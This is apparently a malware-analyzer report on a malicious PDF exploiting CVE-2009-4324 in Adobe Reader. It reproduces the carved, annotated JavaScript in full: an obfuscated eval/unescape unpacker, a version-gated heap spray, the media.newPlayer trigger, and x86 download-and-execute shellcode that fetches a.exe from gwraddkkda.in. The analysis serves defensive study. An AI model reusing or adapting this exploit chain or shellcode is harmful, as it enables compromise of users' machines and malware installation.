MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
T1105 Ingress Tool Transfer (reviewer addition: inferred from the download-and-execute shellcode in the decoded stage below, not part of the analyzer's own mapping)
The PDF's embedded JavaScript is a two-stage unpacker rather than a direct exploit. Stage 1 (object 8) rebuilds `eval`/`unescape` and the Acrobat API names from a character table, reads the `subject` of the first page annotation, turns the "scc" marker back into "%" and double-`unescape`s it into stage 2. Stage 2 reads the EScript plug-in version, heap-sprays a NOP sled plus shellcode, and defines the aliases that stage 1 then uses to call `util.printd()` around `media.newPlayer(null)` — the CVE-2009-4324 trigger. The trigger only runs when the version check sets `j` (9 &lt; v &lt; 9.3 or 8.12 &lt; v &lt; 8.2); on any other EScript version the exploit is silently skipped, which sandboxes should account for when reproducing. The shellcode carries the second-stage URL http://gwraddkkda.in/and/post.php?e=8&amp;&amp; as little-endian %uXXXX escapes; the critical CVE_2009_4324 heuristic and the high-confidence shellcode-download-URL heuristic both fire on this behaviour.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 6
-
media.newPlayer — CVE-2009-4324 — critical — CVE exact — CVE_2009_4324 — PDF JavaScript calls media.newPlayer. CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(); it was actively exploited as a zero-day in December 2009. (Identified after JavaScript deobfuscation: the call is reached only through the aliases vvv4/vvv3 = "media"/"newPlayer" defined by the decoded stage, and only when the EScript version check there sets j.)
-
JavaScript action — low — 2 related findings — PDF_JAVASCRIPT — PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript shellcode contains an embedded download URL — high — PDF_JS_SHELLCODE_DOWNLOAD_URL — Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE). In this sample the %u blob (see legacy_pdfkit_stage_000.js below) also opens with an fs:[0x30] PEB module lookup and builds the stack strings "urlmon.dll" and "kernel32.dll" byte by byte, so the urlmon-based download is directly observable in the bytes rather than inferred.
-
Embedded JS stream — low — PDF_JS — PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact — info — EXTRACTED_FILE_STATIC_TRIAGE — One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL — info — EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://gwraddkkda.in/and/post.php?e=8&amp;&amp; — referenced by PDF JavaScript (recovered from the %u-escaped shellcode, not from a link annotation).
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0008_000.js (digest 0089af380bb502e605cfb8bcc528f2ef7a3c8c1e416a943104cc36dfdbc5830d) |
pdf-javascript-stream | PDF /JS object 8 at offset 0x1E7 | 2221 bytes |
Preview script — first 1,000 lines of the extracted script
// Stage-1 "character oracle": returns single characters that the unpacker below
// concatenates into API names, so that "eval"/"unescape" never appear literally.
//   1 -> app["vie"+"werTy"+app.doc.URL[3]+"e"][1]. The property name only spells
//        "viewerType" when the 4th character of the document URL is "p" (an
//        "http://..." URL); for e.g. "file:///..." it becomes "viewerTyee", the
//        lookup yields undefined and indexing it throws, so the unpacker dies when
//        the PDF is opened from disk (an anti-sandbox gate, or simply an assumption
//        that the file is served over HTTP -- intent not provable from here).
//        The rest of the stage only decodes correctly if this returns "e": the value
//        is reused as the "e" in eval / unescape / getAnnots / subject / replace.
//   2 -> "%"   ("%x" with the x removed)
//   3 -> "a"   ("ax" with the x removed)
function dddsddsgdrvssafdgddddd(iiosooosoos)
{
if(iiosooosoos ==1/*iiosooosoos*/) return ( /*iiosooosoos*/ ""+ /*iiosooosoos*/ app["v"+"ie"/*iiosooosoos*/+""/*iiosooosoos*/+"werTy"+app.doc.URL[3]+"e"][1] /*iiosooosoos*/ );
if(iiosooosoos ==2/*iiosooosoos*/) return ( /*iiosooosoos*/ ""+ /*iiosooosoos*/ "%x".replace(/x/,"") /*iiosooosoos*/ );
if(iiosooosoos ==3/*iiosooosoos*/) return ( /*iiosooosoos*/ ""+ /*iiosooosoos*/ "ax".replace(/x/,"") /*iiosooosoos*/);
}
// ---- Stage 1: unpack the real exploit from an annotation's subject field ----
// Every API name below is assembled from the character table nfffJccIfn89 so that
// "eval", "unescape", "getAnnots", "subject", "replace" never appear as literals.
var /*iiosooosoos*/cCrFqalPHj77/*iiosooosoos*/ = /*iiosooosoos*/this/*iiosooosoos*/; /*iiosooosoos*/ // the document object
// Character table. With dddsddsgdrvssafdgddddd(1) == "e" it reads:
//   ["", "e", "%", "a", "", "", "o", "s", "c", "i", "g", "t", "r", "u", "n", "p"]
// (the names assembled below only spell correctly if slot 1 is "e").
var nfffJccIfn89 =["",dddsddsgdrvssafdgddddd(1),dddsddsgdrvssafdgddddd(2),dddsddsgdrvssafdgddddd(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iiosooosoos*/
var /*iiosooosoos*/cCrFqalPHj77z/*iiosooosoos*/ =/*iiosooosoos*/ app/*iiosooosoos*/; /*iiosooosoos*/ // the Acrobat app object
var PLJcutlTjR1 = nfffJccIfn89[1]; // "e"
var lwutDZCLIS3 = nfffJccIfn89[2]; // "%"
var ajpyILkmZx17 = cCrFqalPHj77[PLJcutlTjR1+"v"+nfffJccIfn89[3]+"l"]; // this["eval"]
var LkjDeLJUKC18 = cCrFqalPHj77[nfffJccIfn89[13]+nfffJccIfn89[14]+PLJcutlTjR1+"s"+nfffJccIfn89[8]+nfffJccIfn89[3]+nfffJccIfn89[15]+PLJcutlTjR1]; // this["unescape"]
// eval('var KlrucFqztA15 = /scc/ig;') -- "scc" is the marker that stands in for "%" in the encoded stage
ajpyILkmZx17("v"+nfffJccIfn89[3]+"r KlrucFqztA15 = /"+nfffJccIfn89[7]+nfffJccIfn89[8]+nfffJccIfn89[8]+"/"+nfffJccIfn89[9]+nfffJccIfn89[10]+";");
var XeHFqNpbZL10 = cCrFqalPHj77z[/*iiosooosoos*/ "d"+nfffJccIfn89[7-1]+nfffJccIfn89[7+1]]; // app["doc"]
XeHFqNpbZL10[nfffJccIfn89[7]+"yn"+nfffJccIfn89[8]+"A"+nfffJccIfn89[14]+nfffJccIfn89[14]+"o"+nfffJccIfn89[11]+"S"+nfffJccIfn89[8]+nfffJccIfn89[3]+"n"](); // app.doc.syncAnnotScan()
var DYdMAYGmsq4 = XeHFqNpbZL10[nfffJccIfn89[10]+PLJcutlTjR1+"tAnn"+nfffJccIfn89[6]+nfffJccIfn89[11]+nfffJccIfn89[7]](0); // app.doc.getAnnots(0): annotations on the first page
var EWjrqbaQjd5 = DYdMAYGmsq4[0][nfffJccIfn89[7]+"ubj"+PLJcutlTjR1+nfffJccIfn89[8]+nfffJccIfn89[11]]; // .subject of the first annotation -- this string carries the encoded payload
var gUaaOeAQpJ6 = EWjrqbaQjd5/*iiosooosoos*/[nfffJccIfn89/*iiosooosoos*/[11+1]+PLJcutlTjR1+/*iiosooosoos*/nfffJccIfn89[15]+"l"/*iiosooosoos*/+nfffJccIfn89/*iiosooosoos*/[3]+nfffJccIfn89/*iiosooosoos*/[8]+PLJcutlTjR1]/*iiosooosoos*/(KlrucFqztA15,lwutDZCLIS3); // subject.replace(/scc/ig, "%"): "scc25scc30scc41..." -> "%25%30%41..."
var isiLFjkMWc7=LkjDeLJUKC18(LkjDeLJUKC18(gUaaOeAQpJ6)); // unescape twice: "%25%30%41" -> "%0A" -> "\n"; the result is the plaintext stage 2
ajpyILkmZx17(isiLFjkMWc7); // eval stage 2; because eval runs in this scope it defines j, s, sh, vvv, vvv2, vvv3, vvv4 here
// ---- Trigger: only reached when stage 2 set j, i.e. the EScript version matched ----
if(j){
// util.printd(vvv, new Date()) -- vvv2 == "printd". NOTE(review): presumably heap grooming
// around the freed object, as in public exploits for this CVE; not verified from the bytes here.
function run(){util[vvv2](vvv, new Date());}
run();run();
// this.media.newPlayer(null) -- vvv4 == "media", vvv3 == "newPlayer": the CVE-2009-4324 use-after-free trigger.
// The try/catch hides the failure on patched readers.
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
|
|||
| javascript_obj0008_001.js (digest 9a09e85d4b10d3522043378c9041956321ab0d71d865a83096c715d9340a1322) |
pdf-javascript-stream | PDF /JS object 8 at offset 0x209 | 43689 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview script — first 1,000 lines of the extracted script (the JavaScript prefix is identical to javascript_obj0008_000.js; this larger carve additionally includes the following PDF object with the "scc"-encoded stage)
// Stage-1 "character oracle": returns single characters that the unpacker below
// concatenates into API names, so that "eval"/"unescape" never appear literally.
//   1 -> app["vie"+"werTy"+app.doc.URL[3]+"e"][1]. The property name only spells
//        "viewerType" when the 4th character of the document URL is "p" (an
//        "http://..." URL); for e.g. "file:///..." it becomes "viewerTyee", the
//        lookup yields undefined and indexing it throws, so the unpacker dies when
//        the PDF is opened from disk (an anti-sandbox gate, or simply an assumption
//        that the file is served over HTTP -- intent not provable from here).
//        The rest of the stage only decodes correctly if this returns "e": the value
//        is reused as the "e" in eval / unescape / getAnnots / subject / replace.
//   2 -> "%"   ("%x" with the x removed)
//   3 -> "a"   ("ax" with the x removed)
function dddsddsgdrvssafdgddddd(iiosooosoos)
{
if(iiosooosoos ==1/*iiosooosoos*/) return ( /*iiosooosoos*/ ""+ /*iiosooosoos*/ app["v"+"ie"/*iiosooosoos*/+""/*iiosooosoos*/+"werTy"+app.doc.URL[3]+"e"][1] /*iiosooosoos*/ );
if(iiosooosoos ==2/*iiosooosoos*/) return ( /*iiosooosoos*/ ""+ /*iiosooosoos*/ "%x".replace(/x/,"") /*iiosooosoos*/ );
if(iiosooosoos ==3/*iiosooosoos*/) return ( /*iiosooosoos*/ ""+ /*iiosooosoos*/ "ax".replace(/x/,"") /*iiosooosoos*/);
}
// ---- Stage 1: unpack the real exploit from an annotation's subject field ----
// Every API name below is assembled from the character table nfffJccIfn89 so that
// "eval", "unescape", "getAnnots", "subject", "replace" never appear as literals.
var /*iiosooosoos*/cCrFqalPHj77/*iiosooosoos*/ = /*iiosooosoos*/this/*iiosooosoos*/; /*iiosooosoos*/ // the document object
// Character table. With dddsddsgdrvssafdgddddd(1) == "e" it reads:
//   ["", "e", "%", "a", "", "", "o", "s", "c", "i", "g", "t", "r", "u", "n", "p"]
// (the names assembled below only spell correctly if slot 1 is "e").
var nfffJccIfn89 =["",dddsddsgdrvssafdgddddd(1),dddsddsgdrvssafdgddddd(2),dddsddsgdrvssafdgddddd(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iiosooosoos*/
var /*iiosooosoos*/cCrFqalPHj77z/*iiosooosoos*/ =/*iiosooosoos*/ app/*iiosooosoos*/; /*iiosooosoos*/ // the Acrobat app object
var PLJcutlTjR1 = nfffJccIfn89[1]; // "e"
var lwutDZCLIS3 = nfffJccIfn89[2]; // "%"
var ajpyILkmZx17 = cCrFqalPHj77[PLJcutlTjR1+"v"+nfffJccIfn89[3]+"l"]; // this["eval"]
var LkjDeLJUKC18 = cCrFqalPHj77[nfffJccIfn89[13]+nfffJccIfn89[14]+PLJcutlTjR1+"s"+nfffJccIfn89[8]+nfffJccIfn89[3]+nfffJccIfn89[15]+PLJcutlTjR1]; // this["unescape"]
// eval('var KlrucFqztA15 = /scc/ig;') -- "scc" is the marker that stands in for "%" in the encoded stage
ajpyILkmZx17("v"+nfffJccIfn89[3]+"r KlrucFqztA15 = /"+nfffJccIfn89[7]+nfffJccIfn89[8]+nfffJccIfn89[8]+"/"+nfffJccIfn89[9]+nfffJccIfn89[10]+";");
var XeHFqNpbZL10 = cCrFqalPHj77z[/*iiosooosoos*/ "d"+nfffJccIfn89[7-1]+nfffJccIfn89[7+1]]; // app["doc"]
XeHFqNpbZL10[nfffJccIfn89[7]+"yn"+nfffJccIfn89[8]+"A"+nfffJccIfn89[14]+nfffJccIfn89[14]+"o"+nfffJccIfn89[11]+"S"+nfffJccIfn89[8]+nfffJccIfn89[3]+"n"](); // app.doc.syncAnnotScan()
var DYdMAYGmsq4 = XeHFqNpbZL10[nfffJccIfn89[10]+PLJcutlTjR1+"tAnn"+nfffJccIfn89[6]+nfffJccIfn89[11]+nfffJccIfn89[7]](0); // app.doc.getAnnots(0): annotations on the first page
var EWjrqbaQjd5 = DYdMAYGmsq4[0][nfffJccIfn89[7]+"ubj"+PLJcutlTjR1+nfffJccIfn89[8]+nfffJccIfn89[11]]; // .subject of the first annotation -- this string carries the encoded payload
var gUaaOeAQpJ6 = EWjrqbaQjd5/*iiosooosoos*/[nfffJccIfn89/*iiosooosoos*/[11+1]+PLJcutlTjR1+/*iiosooosoos*/nfffJccIfn89[15]+"l"/*iiosooosoos*/+nfffJccIfn89/*iiosooosoos*/[3]+nfffJccIfn89/*iiosooosoos*/[8]+PLJcutlTjR1]/*iiosooosoos*/(KlrucFqztA15,lwutDZCLIS3); // subject.replace(/scc/ig, "%"): "scc25scc30scc41..." -> "%25%30%41..." (the object 7 stream below has exactly this form)
var isiLFjkMWc7=LkjDeLJUKC18(LkjDeLJUKC18(gUaaOeAQpJ6)); // unescape twice: "%25%30%41" -> "%0A" -> "\n"; the result is the plaintext stage 2
ajpyILkmZx17(isiLFjkMWc7); // eval stage 2; because eval runs in this scope it defines j, s, sh, vvv, vvv2, vvv3, vvv4 here
// ---- Trigger: only reached when stage 2 set j, i.e. the EScript version matched ----
if(j){
// util.printd(vvv, new Date()) -- vvv2 == "printd". NOTE(review): presumably heap grooming
// around the freed object, as in public exploits for this CVE; not verified from the bytes here.
function run(){util[vvv2](vvv, new Date());}
run();run();
// this.media.newPlayer(null) -- vvv4 == "media", vvv3 == "newPlayer": the CVE-2009-4324 use-after-free trigger.
// The try/catch hides the failure on patched readers.
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
endstream
endobj
7 0 obj
<<
/Length 41160
>>
stream
scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc30scc25scc33scc44scc25scc32scc30scc25scc36scc31scc25scc37scc30scc25scc37scc30scc25scc32scc45scc25scc37scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc34scc39scc25scc36scc45scc25scc37scc33scc25scc33scc42scc25scc30scc41scc25scc36scc36scc25scc36scc46scc25scc37scc32scc25scc32scc30scc25scc32scc38scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc39scc25scc33scc44scc25scc33scc30scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc30scc25scc33scc43scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc45scc25scc36scc43scc25scc36scc35scc25scc36scc45scc25scc36scc37scc25scc37scc34scc25scc36scc38scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc42scc25scc32scc42scc25scc32scc39scc25scc37scc42scc25scc30scc41scc25scc36scc39scc25scc36scc36scc25scc32scc30scc25scc32scc38scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc32scc45scc25scc36scc45scc25scc36scc31scc25scc36scc44scc25scc36scc35scc25scc33scc44scc25scc33scc44scc25scc32scc32scc25scc34scc35scc25scc35scc33scc25scc36scc33scc25scc37scc32scc25scc36scc39scc25scc37scc30scc25scc37scc34scc25scc32scc32scc25scc32scc39scc25scc37scc42scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc43scc25scc37scc36scc25scc33scc44scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc
... (truncated)
|
|||
| legacy_pdfkit_stage_000.js (digest e25eb9dea927fc4a67324232040e7bccd1874be12a367fce24d0ca6ae7a3286e) |
deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0xAC8 | 2744 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview script — first 1,000 lines of the extracted script (stage 2, the plaintext that stage 1 recovers from the "scc"-encoded annotation string and passes to eval)
// ---- Stage 2: plaintext recovered from the "scc"-encoded annotation string ----
// Locate the EScript (Acrobat JavaScript engine) plug-in and read its version.
var aPlugins = app.plugIns;
for (var i=0; i < aPlugins.length; i++){
if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
// Version gate. j is the number of heap-spray blocks and doubles as the "go" flag that
// the stage-1 `if(j)` tests. Only 9 < lv < 9.3 and 8.12 < lv < 8.2 are attacked; any
// other version leaves j undefined and the CVE-2009-4324 trigger is never reached.
if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{}
s=new Array(); // heap-spray array (assigned without var, so an implicit global)
// x86 shellcode as little-endian %uXXXX escapes. Directly readable from the bytes:
// it opens with a jmp and a fs:[0x30] (PEB) module-base lookup, stores the stack
// strings "urlmon.dll", "kernel32.dll" and "a.exe" byte by byte, and ends with the
// UTF-16LE-packed URL http://gwraddkkda.in/and/post.php?e=8&& -- consistent with a
// URLDownloadToFile-style download-and-execute stub. How it resolves the imports and
// what it does with "a.exe" is not verified here.
// NOTE(review): the literal is shown wrapped over two lines in this preview; the carved
// file presumably holds it on a single line.
var sh = "%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A%uC38B%u17
EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45%u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u672F%u7277%u6461%u6B64%u646B%u2E61%u6E69%u612F%u646E%u702F%u736F%u2E74%u6870%u3F70%u3D65%u2638%u0026";
var str="%u9090%u9090"; // NOP-sled seed: two UTF-16 units of 0x9090, i.e. four 0x90 bytes in memory
sh=unescape(sh);str=unescape(str);
// Grow the sled past 0x8000 UTF-16 units, then trim it so that sled + shellcode is
// exactly 0x8000 units (64 KiB) per block, placing the shellcode at a predictable offset.
while(str.length <= 0x8000) {str+=str;}
str=str.substr(0,0x8000 - sh.length);
// Spray j copies: about 87.5 MiB for j=1400 and about 181 MiB for j=2900.
for(i=0;i<j;i++) {s[i]=str + sh;}
// Aliases consumed by the stage-1 trigger, which calls util[vvv2](vvv, new Date())
// and this[vvv4][vvv3](null), i.e. util.printd(...) and this.media.newPlayer(null).
var vvv = "p@111111111111111111111111 : yyyy111"; // printd format string. NOTE(review): presumably chosen for its allocation size; not verified here
var vvv2 = "printd";
var vvv3 = "newPlayer";
var vvv4 = "media";
|
|||
| legacy_pdfkit_stage_001.js (digest 42025b552c7960b53abcd8cd732b01c8d109eccfdfefc352b9826c4d5807d414) |
deobfuscated-js | cross-stage annotation API aliases at offset 0x1E7 | 81 bytes |
Preview script — first 1,000 lines of the extracted script (synthetic: the stage-1 call this[vvv4][vvv3](null) with the aliases vvv4 = "media" and vvv3 = "newPlayer" substituted from stage 2)
media.newPlayer(null); /* alias values recovered from decoded annotation stage */ |
|||